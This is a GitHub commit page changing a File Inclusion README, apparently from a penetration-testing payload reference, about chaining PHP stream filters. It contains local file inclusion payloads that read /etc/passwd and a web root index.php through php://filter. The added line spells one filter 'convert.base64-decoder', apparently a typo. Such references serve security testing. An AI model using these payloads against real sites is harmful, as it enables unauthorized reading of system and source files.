Skip to content

Commit

Permalink
added additional way to chain php filters
Browse files Browse the repository at this point in the history
  • Loading branch information
0xdf223 committed Feb 20, 2020
1 parent 7d650e9 commit 9d06e12
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions File Inclusion/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -133,8 +133,8 @@ can be chained with a compression wrapper for large files.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
```

NOTE: Wrappers can be chained multiple times :
- Multiple base64 decodes: `php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=%s`
NOTE: Wrappers can be chained multiple times using `|` or `/`:
- Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
- deflate then base64encode (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`

```powershell
Expand Down

0 comments on commit 9d06e12

Please sign in to comment.